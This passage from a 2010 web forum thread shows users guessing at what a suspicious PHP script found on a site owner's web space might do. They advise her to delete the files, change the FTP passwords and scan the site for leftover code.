?> Quote Link to comment Share on other sites More sharing options...
jstern Posted May 12, 2010 Report Share Posted May 12, 2010 it looks pretty malicious to me. it also looks like it will rename itself, or its directory periodically. Not sure what it does though. Possibly a attack (brute force) script? The fact that is trying to open / read to your .htaccess file ($fht = fopen("$tname/.htaccess", "w+") tells me you should get rid of it as well. Quote Link to comment Share on other sites More sharing options...
Andrea Posted May 12, 2010 Author Report Share Posted May 12, 2010 Thanks Stern. I didn't think it was anything good, but I don't know enough PHP to understand what this is saying. Quote Link to comment Share on other sites More sharing options...
BeeDev Posted May 12, 2010 Report Share Posted May 12, 2010 We had a similar case before, where a script was dropped in every folder of the website, this script was sending some e-mails to some address specified in the querystring when called by the browser. Looked like it was sending the file/folder structure of the website etc. We had to delete it all and change all the FTP passwords etc. Basically it's good time to change ur passwords now and for any other usernames which have access to this FTP space. After you've done that, it'll be a good idea to scan the whole website for any remainder of this code. Quote Link to comment Share on other sites More sharing options...
krillz Posted May 12, 2010 Report Share Posted May 12, 2010 maybe time to increase the security on the system, as that is no good. If he has an upload script make sure you check it first. Quote Link to comment Share on other sites More sharing options...
Andrea Posted May 12, 2010 Author Report Share Posted May 12, 2010 I'm the only one uploading. I'll check with the host tonight, but meanwhile I'm very curious what this script does. Can anyone tell? Quote Link to comment Share on other sites More sharing options...
krillz Posted May 12, 2010 Report Share Posted May 12, 2010 have you found these files somewhere: c, 1r.txt and 2r.txt check whats inside. From the looks of it it's some kind of link generator however I don't like that it is using the system() function at all. You're only bet is to run the stuff in a sandbox and try it out, could be anything from link generator to a XSS injector to steal user info. Quote Link to comment Share on other sites More sharing options...
Andrea Posted May 12, 2010 Author Report Share Posted May 12, 2010 The host was no help, and I ended up deleting the files. It's the same host I left recently because of similar issues, unfortunately not until after I'd recommended them to a couple clients. Live and Learn.... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.